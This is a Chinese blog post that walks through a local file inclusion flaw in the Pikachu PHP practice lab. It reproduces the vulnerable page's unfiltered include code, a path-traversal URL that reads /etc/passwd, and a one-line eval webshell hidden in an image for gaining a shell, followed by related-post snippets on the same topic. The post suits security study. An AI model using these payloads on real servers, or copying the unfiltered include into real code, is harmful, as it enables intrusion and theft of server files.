文件包含之本地包含的利用

最新推荐文章于 2024-04-18 22:14:48 发布
最新推荐文章于 2024-04-18 22:14:48 发布
阅读量990 收藏
点赞数
分类专栏: 文件包含 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/122465385
版权

文件包含漏洞
在php开发中程序员一般为了方便直接调用一些文件的代码会使用文件包含,如果这个时候把要被包含的文件使用一个变量名控制不做任何过滤就会造成文件包含漏洞

include(filename)这个函数只有到要执行的时候才会包含如果文件不存在,则会发出警告继续执行
require()只要程序一运行就包含,如果文件名不存在直接报错不在执行
include_once()和require_once();若文件代码已被包含则不再包含

代码分析

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "fi_local.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','',
        'active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';



$html='';
if(isset($_GET['submit']) && $_GET['filename']!=null){
    $filename=$_GET['filename'];
    include "include/$filename";//变量传进来直接包含,没做任何的安全限制
//     //安全的写法,使用白名单,严格指定包含的文件名
//     if($filename=='file1.php' || $filename=='file2.php' || $filename=='file3.php' || $filename=='file4.php' || $filename=='file5.php'){
//         include "include/$filename";

//     }
}


?>


<div class="main-content">
    <div class="main-content-inner">
        <div class="breadcrumbs ace-save-state" id="breadcrumbs">
            <ul class="breadcrumb">
                <li>
                    <i class="ace-icon fa fa-home home-icon"></i>
                    <a href="fileinclude.php">file include</a>
                </li>
                <li class="active">本地文件包含</li>
            </ul><!-- /.breadcrumb -->
            <a href="#" style="float:right" data-container="body" data-toggle="popover" data-placement="bottom" title="tips(再点一下关闭)"
               data-content="先了解一下include()函数的用法吧">
                点一下提示~
            </a>
        </div>
        <div class="page-content">

            <div id=fi_main>
                <p class="fi_title">which NBA player do you like?</p>
                <form method="get">
                    <select name="filename">
                        <option value="">--------------</option>
                        <option value="file1.php">Kobe bryant</option>
                        <option value="file2.php">Allen Iverson</option>
                        <option value="file3.php">Kevin Durant</option>
                        <option value="file4.php">Tracy McGrady</option>
                        <option value="file5.php">Ray Allen</option>
                    </select>
                    <input class="sub" type="submit" name="submit" />
                </form>
                <?php echo $html;?>
            </div>


        </div><!-- /.page-content -->
    </div>
</div><!-- /.main-content -->





<?php
include_once $PIKA_ROOT_DIR . 'footer.php';

?>

可以看到直接将filename用include进行包含没做任何过滤
测试漏洞是否存在,由于这里是ubantu系统我们可以包含/etc/passwd文件,由于这个文件没有php代码会直接将信息显示出来的

http://192.168.159.128/06/vul/fileinclude/fi_local.php?filename=…/…/…/…/…/…/…/etc/passwd&submit=%E6%8F%90%E4%BA%A4

在这里插入图片描述
这里的…/是翻阅到上一级目录由于我们现在的目录是/var/www/html/06/vul/fileinclude,需要先跳到/目录下

利用文件包含getshell
我们可以写入一句话的恶意代码到图片里面在包含这张图片就可以执行里面的代码

<?php phpinfo();@eval($_POST['moonsec']);?>

可以用nopd++来打开文件把代码复制进去
在这里插入图片描述
成功包含图片

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
本地文件包含原理常见的函数及利用
G3et的博客
01-11 186
本地文件包含漏洞(Local File Inclusion,LFI)是一种常见的 Web 应用程序漏洞,仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。值得注意看url,一般情况下像file=xx、image=xx、url=等等,需要高度注意,文件包含、任意文件读取等都可以尝试。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交不合法的文件名来读取服务器上的任意文件
浅谈本地文件包含利用
weixin_34179762的博客
08-14 773
今天在公众号看到了一个本地文件包含利用工具,看了下国外大牛对该工具的使用的一个视频,感觉很厉害,通过该工具可对存在本地文件包含漏洞的站点进行利用并返回一个LFI shell,通过返回的LFI shell再次获取一个反向连接,从而可执行相关命令,以前对本地文件包含利用大多都停留在读取文件,如果有远程文件包含的话就可以getshell。这篇文章主要是对本地文件包含的一个简单介...
文件包含常见用法与实际使用效果
最新发布
weixin_71604403的博客
04-18 242
f=file:// 文件路径,这时候可以在文件路径前面加上../,将原来的文件路径改为敏感路径,然后一直加../直到可以访问为止,如果加了很多../还是不能访问可以试着将../进行编码加密。条件:allow_url_fopen: off/on allow_url_include: off/on php 版本大于等于php5.3.0。条件:allow_url_fopen: off/on allow_url_include: off/on。php://filter(本地磁盘文件进行读取)
文件包含利用方式(总结)
PANDA墨森的博客
07-13 4221
一、利用思路总结: 1、包含一些敏感的配置文件,获取目标敏感信息 2、配合图片马getshell 3、包含临时文件getshell 4、包含session文件getshell 5、包含日志文件getshell(Apach、SSH等等) 6、利用php伪协议进行攻击 二、具体利用方法: ①包含一些敏感的配置文件 windows常见的敏感文件路径: C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配.
文件包含漏洞之——防御措施
wsnbbz的博客
03-04 3821
设置白名单 代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。 过滤危险字符 由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。 设置文件目录(配置php.ini) PHP配置文件中有open_basedir...
文件包含漏洞利用
qq_56327824的博客
04-27 3092
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞; PHP包含文件PHP包含文件PHP包含日志文件PHP截断包含;...
minio实现本地和云端文件同步
02-26
在本文中,我们将深入探讨如何利用Java来实现本地文件与MinIO云端存储的同步。 首先,我们需要理解MinIO的核心接口,包括上传、下载和删除文件。在Java中,MinIO提供了`MinioClient`类,这是与MinIO服务器进行交互...
文件包含利用总结(本地文件包含、远程文件包含、常用敏感文件phpinfo利用、伪协议利用
墨痕诉清风的博客
04-18 182
文件包含利用总结(本地文件包含、远程文件包含、常用敏感文件phpinfo利用
文件包含
qq_53086690的博客
04-20 138
  程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。   程序开发人员都希望代码能够更灵活,所以通常会将包含文件设置为变量,用来进行动态调用,但正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞   几乎在所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,而在JSP,ASP,ASP.NET中却非常少,甚至没有包含漏洞的存在,这与程序开发人员的水平无关
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含php 中,涉及到的危险函数有四个,分别是 inclu...
本地文件包含详解
m0_46317658的博客
02-28 5597
文件包含的概念: 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含文件包含的原理: 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 文件包含分类 文件包含分为本地文件包含和远程文件包含,而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_ url_ include. 如果开启就有可能包含远程文件。远程文件包含
五种利用本地包含漏洞的方式
weixin_33694172的博客
09-25 1001
本文讲的是五种利用本地包含漏洞的方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。 本...
文件包含利用姿势
weixin_30335575的博客
04-12 153
http://thief.one/2017/04/10/2/ 转载于:https://www.cnblogs.com/esthermalley/p/6699131.html
什么是文件包含漏洞?文件包含漏洞利用方法及防御技巧
2201_75362610的博客
03-22 1807
例如,攻击者可以将 _GET[‘url’]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将 G​ET[′url′]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将_GET[‘url’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。例如,攻击者可以将 G​ET[′file′]的值,那么他们就可以在目标系统上包含任意文件。如果攻击者能够控制包含文件的内容,那么他们就可以在目标系统上执行任意代码。
如何有效规避本地文件包含简单利用的漏洞攻击
weixin_30666753的博客
03-23 240
本文主要是对文件包含做了一个简单的介绍,如文件包含漏洞的简单原理及危害,最重要的是对本地文件包含漏洞的进一步利用,通过本地文件包含漏洞,从而获取到一个反向连接或者是LFI shell。通过本文也让自己对本地文件包含的危害和利用都有了一定的提高,不在是只停留在读取文件上! 作者:Simeon来源:51CTO.com|2017-07-17 13:30 收藏 分享 【51CTO...
使用文件包含include指令
chiyan1769的博客
05-30 197
index.jsp <%@pagelanguage="java"contentType="text/html;charset=UTF-8"pageEncoding="UTF-8"%> <html> <head> <metahttp-equ...
php文件包含漏洞(利用phpinfo)
06-28
回答1:</h3><br/>PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值